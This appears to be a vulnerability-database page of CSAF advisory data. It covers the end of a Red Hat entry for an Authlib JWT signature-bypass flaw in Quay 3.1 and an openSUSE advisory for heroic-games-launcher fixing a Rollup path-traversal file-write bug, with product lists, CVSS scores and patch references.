{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
}
]
}
OPENSUSE-SU-2026:10263-1
Vulnerability from csaf_opensuse - Published: 2026-02-26 00:00 - Updated: 2026-02-26 00:00Summary
heroic-games-launcher-2.20.0-2.1 on GA media
Severity
Moderate
Notes
Title of the patch: heroic-games-launcher-2.20.0-2.1 on GA media
Description of the patch: These are all security issues fixed in the heroic-games-launcher-2.20.0-2.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10263
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "heroic-games-launcher-2.20.0-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the heroic-games-launcher-2.20.0-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10263",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10263-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27606/"
}
],
"title": "heroic-games-launcher-2.20.0-2.1 on GA media",
"tracking": {
"current_release_date": "2026-02-26T00:00:00Z",
"generator": {
"date": "2026-02-26T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10263-1",
"initial_release_date": "2026-02-26T00:00:00Z",
"revision_history": [
{
"date": "2026-02-26T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.aarch64",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.aarch64",
"product_id": "heroic-games-launcher-2.20.0-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.ppc64le",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.ppc64le",
"product_id": "heroic-games-launcher-2.20.0-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.s390x",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.s390x",
"product_id": "heroic-games-launcher-2.20.0-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.x86_64",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.x86_64",
"product_id": "heroic-games-launcher-2.20.0-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27606"
}
],
"notes": [
{
"category": "general",
"text": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27606",
"url": "https://www.suse.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "SUSE Bug 1258846 for CVE-2026-27606",
"url": "https://bugzilla.suse.com/1258846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-26T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-27606"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…